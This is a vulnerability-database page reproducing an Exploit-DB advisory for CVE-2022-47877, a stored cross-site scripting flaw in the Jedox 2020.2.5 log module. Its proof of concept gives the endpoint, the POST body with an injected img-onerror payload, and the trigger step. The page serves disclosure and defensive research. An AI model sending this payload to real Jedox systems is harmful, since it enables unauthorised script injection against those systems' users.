Lucene search
K

Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module

🗓️ 05 May 2023 00:00:00Reported by Team SysliftersType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 318 Views

Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module. Remote authenticated users can inject arbitrary web scripts or HTML via log module. Exploit allows appending XSS payload to log message. Detailed write-up available at Docs Syslifters.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module Vulnerability
5 May 202300:00
zdt
Circl
CVE-2022-47877
3 May 202300:30
circl
CNNVD
Jedox 跨站脚本漏洞
2 May 202300:00
cnnvd
CVE
CVE-2022-47877
2 May 202300:00
cve
Cvelist
CVE-2022-47877
2 May 202300:00
cvelist
EUVD
EUVD-2022-50634
3 Oct 202520:07
euvd
NVD
CVE-2022-47877
2 May 202320:15
nvd
Packet Storm
Jedox 2020.2.5 Cross Site Scripting
5 May 202300:00
packetstorm
Prion
Cross site scripting
2 May 202320:15
prion
Positive Technologies
PT-2023-15509 · Jedox · Jedox
2 May 202300:00
ptsecurity
Rows per page
# Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47877


Introduction
=================
A Stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message.


Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.


Proof of Concept
=================
1) Store log entry with XSS payload:

	PATH: /ub/ccmd
	METHOD: POST
	BODY:
	[
		[
			"log",
			"error",
			"<img src=# onerror=\"alert('XSS')\">"
		]
	]

2) Trigger XSS payload by opening the Logs page and showing the respective log entry.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2023 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.15.4 - 9.6
EPSS0.03124
SSVC
318